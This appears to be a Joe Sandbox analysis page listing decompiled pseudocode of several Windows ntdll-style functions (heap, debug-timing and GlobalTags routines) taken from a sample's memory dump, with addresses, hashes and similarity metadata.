Instruction Fuzzy Hash: 00015A3A11525DAFDF129F85CC40EDA3F66FB4C754F068111FE1966220C636E971EB80

Uniqueness

Uniqueness Score: -1.00%

Function 328892AF Relevance: 1.5, APIs: 1, Instructions: 35
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E328892AF(void* __ecx) {
				char _v5;
				void* _t12;
				intOrPtr* _t22;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				_v5 = 0;
				_t22 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t22 != 0) {
					 *0x329891e0(1, __ecx,  *((intOrPtr*)(__ecx + 0x10)),  *((intOrPtr*)(__ecx + 0x18)), 0,  &_v5);
					 *_t22();
				}
				_t12 = E32889303(_t25 + 0x5c);
				if(( *(_t25 + 4) & 0x00000002) == 0) {
					_t12 = E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t25 - 4);
				}
				return _t12;
			}

0x328892b4
0x328892b6
0x328892b8
0x328892bd
0x328892c2
0x328892d5
0x328892db
0x328892db
0x328892e0
0x328892e9
0x328892fa
0x328892fa
0x32889302

APIs

RtlDebugPrintTimes.NTDLL ref: 328892D5

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 500fb48f342098233c622a667c5c684176aabccf8bd345f3d0f9bc138599d3e9
Instruction ID: fc3087c1ca6e16c0dbb69f7f90a4eac067a20eee41631544c207510e1b0e7241
Opcode Fuzzy Hash: 500fb48f342098233c622a667c5c684176aabccf8bd345f3d0f9bc138599d3e9
Instruction Fuzzy Hash: A1F0FA3A204604ABE3319B49CC04F9ABBEDEF84B00F080518A94693691CBA0E90AC760

Uniqueness

Uniqueness Score: -1.00%

Function 328CA580 Relevance: 1.4, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E328CA580(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t88;
				signed short* _t89;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				signed int _t96;
				signed int _t100;
				void* _t101;
				signed int _t102;
				signed int _t104;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr _t122;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t135;
				signed int _t136;
				void* _t137;
				signed char _t139;
				signed short* _t141;
				signed int _t144;
				signed int _t145;
				void* _t147;

				_t143 = __esi;
				_t140 = __edi;
				_push("true");
				_push(0x3296c9a0);
				E328E7BE4(__ebx, __edi, __esi);
				 *(_t147 - 0x48) =  *(_t147 + 0x10);
				_t110 =  *(_t147 + 8);
				 *(_t147 - 0x4c) = _t110;
				_t114 = 0;
				 *((char*)(_t147 - 0x19)) = 0;
				_t87 =  *[fs:0x30];
				if(( *(_t87 + 0x68) & 0x00000800) != 0) {
					__eflags =  *0x32986d3c - _t114; // 0x0
					if(__eflags != 0) {
						L6:
						__eflags = _t110;
						if(_t110 == 0) {
							L9:
							 *(_t147 - 0x34) = _t114;
							 *(_t147 - 4) = _t114;
							__eflags = _t110;
							if(_t110 == 0) {
								L15:
								_t144 = _t114;
								 *(_t147 - 0x28) = _t144;
								_t128 = _t114;
								 *(_t147 - 0x40) = _t128;
								_t88 = 0x21;
								_t141 =  *(_t147 + 0x14);
								__eflags =  *_t141 - _t88;
								if( *_t141 != _t88) {
									 *(_t147 - 0x24) = _t114;
									L20:
									_t89 = _t141;
									 *(_t147 - 0x30) = _t89;
									while(1) {
										_t115 =  *_t89 & 0x0000ffff;
										__eflags = _t115;
										if(_t115 != 0) {
											goto L27;
										} else {
											break;
										}
										while(1) {
											L27:
											_t89 =  &(_t89[1]);
											 *(_t147 - 0x30) = _t89;
											__eflags = _t115;
											if(_t115 == 0) {
												break;
											}
											_t115 =  *_t89 & 0x0000ffff;
										}
										_t128 = _t128 + 1;
										 *(_t147 - 0x40) = _t128;
									}
									__eflags = _t128;
									if(_t128 == 0) {
										L50:
										_t145 = _t144 << 0x12;
										__eflags = _t145;
										L51:
										 *(_t147 - 0x34) = _t145;
										 *(_t147 - 4) = 0xfffffffe;
										E329066C4(_t110);
										_t91 = _t145;
										L2:
										 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0x10));
										return _t91;
									}
									_t119 = E32937786(_t110, _t128);
									 *(_t147 - 0x20) = _t119;
									__eflags = _t119;
									if(_t119 == 0) {
										goto L50;
									}
									_t93 = 0x17;
									 *(_t147 - 0x2c) = _t93;
									 *(_t147 - 0x44) = _t93;
									_t144 =  *(_t119 + 0xc) & 0x0000ffff;
									 *(_t147 - 0x28) = _t144;
									__eflags = _t144;
									if(_t144 != 0) {
										__eflags = _t144 - 0x800;
										if(_t144 != 0x800) {
											L34:
											_t129 =  *(_t147 + 0x10);
											__eflags = _t129;
											if(_t129 == 0) {
												L42:
												_t94 = 0;
												__eflags = 0;
												_t130 = 0;
												 *(_t147 - 0x24) = 0;
												L43:
												 *(_t147 - 0x3c) = _t130;
												 *(_t147 - 0x30) = _t141;
												while(1) {
													__eflags =  *_t141;
													_t110 =  *(_t147 + 8);
													if( *_t141 == 0) {
														goto L50;
													}
													_t120 = _t119 + 0x10;
													 *((intOrPtr*)(_t147 - 0x38)) = _t119 + 0x10;
													__eflags = _t130;
													if(_t130 != 0) {
														L328B5C3F(_t120,  *(_t147 - 0x2c) +  *(_t147 - 0x2c), _t130);
														_t94 =  *(_t147 - 0x24);
														_t122 =  *((intOrPtr*)(_t147 - 0x38));
														_t120 = _t122 + _t94 * 2;
														 *((intOrPtr*)(_t147 - 0x38)) = _t122 + _t94 * 2;
													}
													__eflags =  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94;
													L328B5C3F(_t120,  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94, _t141);
													do {
														_t96 =  *_t141 & 0x0000ffff;
														_t141 =  &(_t141[1]);
														 *(_t147 - 0x30) = _t141;
														__eflags = _t96;
													} while (_t96 != 0);
													_t119 =  *(_t147 - 0x20) + 0x40;
													 *(_t147 - 0x20) = _t119;
													_t94 =  *(_t147 - 0x24);
													_t130 =  *(_t147 - 0x3c);
												}
												goto L50;
											}
											_t54 = _t129 + 2; // 0x3
											 *(_t147 - 0x3c) = _t54;
											do {
												_t100 =  *_t129;
												_t129 = _t129 + 2;
												__eflags = _t100;
											} while (_t100 != 0);
											_t135 = _t129 -  *(_t147 - 0x3c);
											__eflags = _t135;
											_t136 = _t135 >> 1;
											 *(_t147 - 0x24) = _t136;
											 *(_t147 - 0x3c) = _t136;
											if(_t135 == 0) {
												goto L42;
											}
											__eflags = _t136 - 0x13;
											if(_t136 < 0x13) {
												_t101 = 0x17;
												_t102 = _t101 - _t136;
												__eflags = _t102;
												 *(_t147 - 0x2c) = _t102;
												 *(_t147 - 0x44) = _t102;
												_t94 =  *(_t147 - 0x24);
											} else {
												_t94 = 0;
												 *(_t147 - 0x24) = 0;
											}
											__eflags =  *(_t147 - 0x3c) - 0x13;
											asm("sbb edx, edx");
											_t130 = _t136 &  *(_t147 - 0x48);
											goto L43;
										}
										_push(L"GlobalTags");
										L32:
										_t137 = 0x2e;
										__eflags = _t119 + 0x10;
										L328B5C3F(_t119 + 0x10, _t137);
										_t119 =  *(_t147 - 0x20);
										L33:
										_t119 = _t119 + 0x40;
										__eflags = _t119;
										 *(_t147 - 0x20) = _t119;
										_t144 =  *(_t119 + 0xc) & 0x0000ffff;
										 *(_t147 - 0x28) = _t144;
										goto L34;
									}
									_t104 =  *(_t147 - 0x24);
									__eflags = _t104;
									if(_t104 == 0) {
										goto L33;
									}
									_push(_t104);
									goto L32;
								}
								 *(_t147 - 0x24) =  &(_t141[1]);
								while(1) {
									_t141 =  &(_t141[1]);
									 *(_t147 + 0x14) = _t141;
									__eflags = _t88;
									if(_t88 == 0) {
										goto L20;
									}
									_t88 =  *_t141 & 0x0000ffff;
								}
								goto L20;
							}
							_t139 =  *(_t147 + 0xc) |  *(_t110 + 0x44);
							__eflags = _t139 & 0x61000000;
							asm("bt edx, 0x1c");
							__eflags = (_t87 & 0xffffff00 | (_t139 & 0x61000000) >= 0x00000000) & (_t114 & 0xffffff00 | (_t139 & 0x61000000) != 0x00000000);
							if(__eflags == 0) {
								__eflags = _t139 & 0x00000001;
								if((_t139 & 0x00000001) == 0) {
									E3289FED0( *((intOrPtr*)(_t110 + 0xc8)));
									 *((char*)(_t147 - 0x19)) = 1;
								}
								_t114 = 0;
								__eflags = 0;
								goto L15;
							}
							_push( *(_t147 + 0x14));
							_push( *(_t147 + 0x10));
							_t145 = E3293F76A(_t110, _t110, _t139, _t140, _t143, __eflags);
							goto L51;
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0xddeeddee;
						if( *((intOrPtr*)(_t110 + 8)) == 0xddeeddee) {
							goto L1;
						}
						__eflags =  *(_t110 + 0x44) & 0x01000000;
						if(( *(_t110 + 0x44) & 0x01000000) != 0) {
							goto L1;
						}
						goto L9;
					}
					_t87 = L328A5D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", 0x258);
					 *0x32986d3c = _t87;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L1;
					}
					_t114 = 0;
					__eflags = 0;
					goto L6;
				}
				L1:
				_t91 = 0;
				goto L2;
			}

0x328ca580
0x328ca580
0x328ca580
0x328ca582
0x328ca587
0x328ca58f
0x328ca592
0x328ca595
0x328ca598
0x328ca59a
0x328ca59d
0x328ca5aa
0x329064a9
0x329064af
0x329064d5
0x329064d5
0x329064d7
0x329064f3
0x329064f3
0x329064f6
0x329064f9
0x329064fb
0x32906541
0x32906541
0x32906543
0x32906546
0x32906548
0x3290654d
0x3290654e
0x32906551
0x32906554
0x3290656c
0x3290656f
0x3290656f
0x32906571
0x32906574
0x32906574
0x32906577
0x3290657a
0x00000000
0x00000000
0x00000000
0x00000000
0x329065b6
0x329065b6
0x329065b6
0x329065b9
0x329065bc
0x329065bf
0x00000000
0x00000000
0x329065c1
0x329065c1
0x329065c6
0x329065c7
0x329065c7
0x3290657c
0x3290657e
0x329066a5
0x329066a5
0x329066a5
0x329066a8
0x329066a8
0x329066ab
0x329066b2
0x329066b7
0x328ca5b2
0x328ca5b5
0x328ca5c1
0x328ca5c1
0x3290658b
0x3290658d
0x32906590
0x32906592
0x00000000
0x00000000
0x3290659a
0x3290659b
0x3290659e
0x329065a1
0x329065a5
0x329065a8
0x329065aa
0x329065cc
0x329065d2
0x329065f4
0x329065f4
0x329065f7
0x329065f9
0x32906640
0x32906640
0x32906640
0x32906642
0x32906644
0x32906647
0x32906647
0x3290664a
0x3290664d
0x3290664f
0x32906652
0x32906655
0x00000000
0x00000000
0x32906657
0x3290665a
0x3290665d
0x3290665f
0x32906668
0x3290666d
0x32906670
0x32906673
0x32906676
0x32906676
0x3290667f
0x32906681
0x32906686
0x32906686
0x32906689
0x3290668c
0x3290668f
0x3290668f
0x32906697
0x3290669a
0x3290669d
0x329066a0
0x329066a0
0x00000000
0x3290664d
0x329065fb
0x329065fe
0x32906601
0x32906601
0x32906604
0x32906609
0x32906609
0x3290660e
0x3290660e
0x32906611
0x32906613
0x32906616
0x32906619
0x00000000
0x00000000
0x3290661b
0x3290661e
0x32906629
0x3290662a
0x3290662a
0x3290662c
0x3290662f
0x32906632
0x32906620
0x32906620
0x32906622
0x32906622
0x32906635
0x32906639
0x3290663b
0x00000000
0x3290663b
0x329065d4
0x329065d9
0x329065db
0x329065dc
0x329065df
0x329065e4
0x329065e7
0x329065e7
0x329065e7
0x329065ea
0x329065ed
0x329065f1
0x00000000
0x329065f1
0x329065ac
0x329065af
0x329065b1
0x00000000
0x00000000
0x329065b3
0x00000000
0x329065b3
0x32906559
0x3290655c
0x3290655c
0x3290655f
0x32906562
0x32906565
0x00000000
0x00000000
0x32906567
0x32906567
0x00000000
0x3290655c
0x32906500
0x32906503
0x3290650c
0x32906513
0x32906515
0x3290652b
0x3290652e
0x32906536
0x3290653b
0x3290653b
0x3290653f
0x3290653f
0x00000000
0x3290653f
0x32906517
0x3290651a
0x32906524
0x00000000
0x32906524
0x329064d9
0x329064e0
0x00000000
0x00000000
0x329064e6
0x329064ed
0x00000000
0x00000000
0x00000000
0x329064ed
0x329064c1
0x329064c6
0x329064cb
0x329064cd
0x00000000
0x00000000
0x329064d3
0x329064d3
0x00000000
0x329064d3
0x328ca5b0
0x328ca5b0
0x00000000

Strings

GlobalTags, xrefs: 329065D4

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 73ccb45327dd9e356fc1c2f7ea972ec737ac0d2564aab3a1eda75829b6335b00
Instruction ID: e891e3c63177cad0d9dd3944a6bbbdfc1486ff353d5fd1ea9a8f448096dd8683
Opcode Fuzzy Hash: 73ccb45327dd9e356fc1c2f7ea972ec737ac0d2564aab3a1eda75829b6335b00
Instruction Fuzzy Hash: E2715AB9E0021E9FEB18CF98D59069DBBB6BF48354F10C12EE905AB244EB758941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 328A02F9 Relevance: 1.4, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E328A02F9(void* __ecx, signed char* __edx, signed char* _a4, signed short* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				signed char* _v28;
				signed short* _v32;
				void* _v36;
				signed char* _v40;
				char _v44;
				intOrPtr _v48;
				signed short _v56;
				signed short _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t73;
				signed char* _t76;
				signed char* _t78;
				intOrPtr _t93;
				void* _t124;
				signed short* _t125;
				signed char* _t131;
				signed char* _t150;
				void* _t153;
				void* _t154;
				signed int _t156;

				_t142 = __edx;
				_t126 = __ecx;
				_v8 =  *0x3298b370 ^ _t156;
				_v40 = _a4;
				_t124 = __ecx;
				_v28 = __edx;
				_v32 = _a8;
				_t73 = L328A3C40();
				_t150 = 0x7ffe0384;
				if(_t73 != 0) {
					_t76 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t76 = 0x7ffe0384;
				}
				_t152 = 0x7ffe0385;
				if( *_t76 != 0) {
					if(L328A3C40() == 0) {
						_t78 = 0x7ffe0385;
					} else {
						_t78 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t78 & 0x00000010) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(L328A3C40() != 0) {
						_t96 = ( *[fs:0x30])[0x50] + 0x22a;
					} else {
						_t96 = _t150;
					}
					if( *_t96 != 0) {
						_t96 =  *[fs:0x30];
						if((( *[fs:0x30])[0x240] & 0x00000004) == 0) {
							goto L6;
						}
						if(L328A3C40() != 0) {
							_t96 =  *[fs:0x30];
							_t152 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t152 & 0x00000020) != 0) {
							L18:
							_t152 = _v28;
							_v36 =  *((intOrPtr*)(_t124 + 0x18)) + _v28[4];
							E328D4FD0(_t126,  &_v56,  *((intOrPtr*)(_t124 + 0x18)) + _v28[4]);
							_t127 = _t124;
							E3290F899(_t124, _v28, _v32,  &_v36,  &_v44);
							_t86 = _v36;
							if(_v36 == 0) {
								L328DFF70( &_v20, "true", "#%u", _v44);
								_t86 =  &_v20;
							}
							E328D4FD0(_t127,  &_v64, _t86);
							_t142 = _v40;
							_t125 = _t124 + 0x24;
							_v32 = _t125;
							_t131 = (_v40[0x24] & 0x0000ffff) + 8 + ((_v64 & 0x0000ffff) + (_v56 & 0x0000ffff)) * 2 + ( *_t125 & 0x0000ffff);
							_t93 =  *0x32985d78; // 0x0
							_v28 = _t131;
							_v48 = _t131 + 0x24;
							_t124 = L328A5D90(_t131 + 0x24, ( *[fs:0x30])[0x18], _t93 + 0x180000, _t131 + 0x24);
							if(_t124 != 0) {
								_t153 = _t124 + 0x24;
								 *((short*)(_t124 + 6)) = 0x14d6;
								 *((intOrPtr*)(_t124 + 0x20)) = 3;
								L3290FD65(_v32, _t153, _v28,  &_v24);
								_t154 = _t153 + _v24;
								_v28 = _v28 - _v24;
								L3290FD65( &(_v40[0x24]), _t154, _v28 - _v24,  &_v24);
								_t152 = _t154 + _v24;
								_v28 = _v28 - _v24;
								L3290FD20( &_v56, _t152, _v28 - _v24,  &_v24);
								_t142 = _v24 + _t152;
								L3290FD20( &_v64, _v24 + _t152, _v28 - _v24,  &_v24);
								if(L328A3C40() != 0) {
									_t150 = ( *[fs:0x30])[0x50] + 0x22a;
								}
								_push(_t124);
								_push(_v48 + 0xffffffe0);
								_push(0x402);
								_push( *_t150 & 0x000000ff);
								E328D2F90();
								_t96 = E328A3BC0(( *[fs:0x30])[0x18], 0, _t124);
							}
						}
						goto L6;
					} else {
						L6:
						return E328D4B50(_t96, _t124, _v8 ^ _t156, _t142, _t150, _t152);
					}
				}
			}

0x328a02f9
0x328a02f9
0x328a0308
0x328a0310
0x328a0313
0x328a0319
0x328a031c
0x328a031f
0x328a0324
0x328a032b
0x328f4ae2
0x328a0331
0x328a0331
0x328a0331
0x328a0336
0x328a033b
0x328f4af3
0x328f4b05
0x328f4af5
0x328f4afe
0x328f4afe
0x328f4b0a
0x00000000
0x328f4b0c
0x00000000
0x328f4b0c
0x328a0341
0x328a0341
0x328a0348
0x328f4b1a
0x328a034e
0x328a034e
0x328a034e
0x328a0353
0x328f4b24
0x328f4b31
0x00000000
0x00000000
0x328f4b3e
0x328f4b40
0x328f4b49
0x328f4b49
0x328f4b52
0x328f4b58
0x328f4b58
0x328f4b62
0x328f4b69
0x328f4b77
0x328f4b7d
0x328f4b82
0x328f4b87
0x328f4b97
0x328f4b9f
0x328f4b9f
0x328f4ba7
0x328f4bac
0x328f4baf
0x328f4bbc
0x328f4bcc
0x328f4bce
0x328f4bd3
0x328f4be6
0x328f4bf1
0x328f4bf5
0x328f4bfe
0x328f4c09
0x328f4c14
0x328f4c1b
0x328f4c29
0x328f4c33
0x328f4c39
0x328f4c47
0x328f4c4e
0x328f4c54
0x328f4c69
0x328f4c6c
0x328f4c78
0x328f4c83
0x328f4c83
0x328f4c8c
0x328f4c90
0x328f4c94
0x328f4c99
0x328f4c9a
0x328f4cab
0x328f4cab
0x328f4bf5
0x00000000
0x328a0359
0x328a0359
0x328a0367
0x328a0367
0x328a0353

Strings

#%u, xrefs: 328F4B8F

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: #%u
API String ID: 0-232158463
Opcode ID: 5f3d72f184e00b1b3a8b9389e8ce89ea14cbd655c19f566cc86d7a8992f9ba6c
Instruction ID: f300aaca46a37a328c75a7d31029618e7bcf49e6e34568fd033220b9a3b41dc0
Opcode Fuzzy Hash: 5f3d72f184e00b1b3a8b9389e8ce89ea14cbd655c19f566cc86d7a8992f9ba6c
Instruction Fuzzy Hash: 42716C79A00209AFDB05CFA8D994FAEB7F8FF08704F144066E915E7251EB74E945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 3291F42F Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E3291F42F(short* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				char* _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v44;
				char _v52;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v84;
				signed int _t48;
				signed int _t55;
				intOrPtr _t84;
				short _t87;
				intOrPtr _t89;
				void* _t97;
				intOrPtr _t98;
				signed int _t101;

				_t90 = __ecx;
				_v76 = _v76 & 0x00000000;
				_t87 = 0;
				_v72 = __edx;
				if(__ecx == 0 || __edx == 0 || _a4 == 0) {
					_t48 = 0xc000000d;
					goto L26;
				} else {
					if( *__ecx == 0x5c) {
						E328D5050(__ecx,  &_v68, __ecx);
						L8:
						_v24 = _v24 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
						_push(0x4021);
						_v20 =  &_v68;
						_push(7);
						_push( &_v52);
						_v28 = 0x18;
						_push( &_v28);
						_push(0x100001);
						_v16 = 0x40;
						_push( &_v76);
						_t55 = L328D2CE0();
						_t101 = _t55;
						if(_t87 == 0) {
							L13:
							if(_t101 >= 0) {
								_t97 = L328A5D90(_t90,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", 0x410);
								if(_t97 != 0) {
									E328D5050(_t90,  &_v60, _v72);
									_push(0);
									_push( &_v68);
									_push(1);
									_push(3);
									_push(0x410);
									_push(_t97);
									_push( &_v60);
									_push(0);
									_push(0);
									_push(0);
									_push(_v84);
									_t101 = L328D2D00();
									if(_t101 >= 0) {
										_t66 =  *(_t97 + 0x3c);
										if( *(_t97 + 0x3c) <= 0x104) {
											_t89 = L328A5D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t66 + 4);
											if(_t89 != 0) {
												_t39 = _t97 + 0x5e; // 0x5e
												E328D88C0(_t89, _t39,  *(_t97 + 0x3c));
												 *((short*)(_t89 + ( *(_t97 + 0x3c) >> 1) * 2)) = 0;
												 *_a4 = _t89;
											} else {
												_t101 = 0xc0000017;
											}
										}
									}
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t97);
								} else {
									_t101 = 0xc0000017;
								}
							}
							L22:
							if(_v76 != 0) {
								_push(_v76);
								E328D2A80();
							}
							_t48 = _t101;
							L26:
							return _t48;
						}
						_t98 = _v32;
						if(_t98 != 0) {
							asm("lock xadd [edi], eax");
							if((_t55 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t98 + 4)));
								E328D2A80();
								E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t98);
							}
						}
						E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t87);
						goto L13;
					}
					_push( &_v44);
					_push(0);
					_push( &_v68);
					_t90 = 2;
					_t101 = L328B1C48(__ecx, __ecx);
					if(_t101 < 0) {
						goto L22;
					} else {
						_t84 = _v44;
						_t87 = _v64;
						if(_t84 != 0) {
							_v68 = _t84;
							_v64 = _v40;
						}
						goto L8;
					}
				}
			}

0x3291f42f
0x3291f43a
0x3291f443
0x3291f445
0x3291f44c
0x3291f607
0x00000000
0x3291f463
0x3291f467
0x3291f4a9
0x3291f4ae
0x3291f4ae
0x3291f4b7
0x3291f4bc
0x3291f4c1
0x3291f4c6
0x3291f4ce
0x3291f4d0
0x3291f4d5
0x3291f4dd
0x3291f4de
0x3291f4e7
0x3291f4ef
0x3291f4f0
0x3291f4f5
0x3291f4f9
0x3291f536
0x3291f538
0x3291f554
0x3291f558
0x3291f56d
0x3291f578
0x3291f579
0x3291f57a
0x3291f57c
0x3291f57e
0x3291f57f
0x3291f584
0x3291f585
0x3291f586
0x3291f587
0x3291f588
0x3291f591
0x3291f595
0x3291f597
0x3291f59f
0x3291f5b5
0x3291f5b9
0x3291f5c5
0x3291f5ca
0x3291f5d9
0x3291f5e0
0x3291f5bb
0x3291f5bb
0x3291f5bb
0x3291f5b9
0x3291f59f
0x3291f5ee
0x3291f55a
0x3291f55a
0x3291f55a
0x3291f558
0x3291f5f3
0x3291f5f8
0x3291f5fa
0x3291f5fe
0x3291f5fe
0x3291f603
0x3291f60c
0x3291f612
0x3291f612
0x3291f4fb
0x3291f501
0x3291f506
0x3291f50a
0x3291f50c
0x3291f50f
0x3291f520
0x3291f520
0x3291f50a
0x3291f531
0x00000000
0x3291f531
0x3291f46f
0x3291f470
0x3291f475
0x3291f478
0x3291f47e
0x3291f482
0x00000000
0x3291f488
0x3291f488
0x3291f48c
0x3291f493
0x3291f495
0x3291f49d
0x3291f49d
0x00000000
0x3291f493
0x3291f482

Strings

@, xrefs: 3291F4E7

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1270eafa4ad1ecb009350c71943b8a0e3ef1f833ee4d24814bbdd6f6672cbea9
Instruction ID: c59215d9afc247ce5d9a295df7dd4947f49cacc84a408dffb7038fb33b233032
Opcode Fuzzy Hash: 1270eafa4ad1ecb009350c71943b8a0e3ef1f833ee4d24814bbdd6f6672cbea9
Instruction Fuzzy Hash: 9451BAB6604749AFE7218F19C840F6BB7E8FB84754F400929FA5497291DBB4ED08CB91

Uniqueness

Uniqueness Score: -1.00%

Function 328C41BB Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E328C41BB(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = L328A58B0(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = L328D2CE0();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push("true");
						_push("true");
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E328D2E40();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E328D2A80();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x552de01a
							_t109 = L328A5D90(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t109 + 0x18;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2002552d
								E328D88C0(_t109 + 0x18,  *_t29,  *_t103 & 0x0000ffff);
								_push("true");
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2002552d
								_t100 = _t91 & 0xfffffffe;
								_pop(_t84);
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E328D2A80();
										E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x328c41cf
0x328c41d5
0x328c41dc
0x328c41e3
0x328c41ee
0x328c41f0
0x328c41f4
0x328c41fc
0x328c4204
0x328c4209
0x328c4211
0x328c4212
0x328c421b
0x328c421f
0x328c4220
0x328c4228
0x328c422c
0x328c4230
0x328c4239
0x328c4240
0x328c4247
0x328c424e
0x32902e52
0x32902e52
0x328c4254
0x328c4254
0x328c4256
0x328c425c
0x328c4261
0x328c4262
0x328c426b
0x328c426f
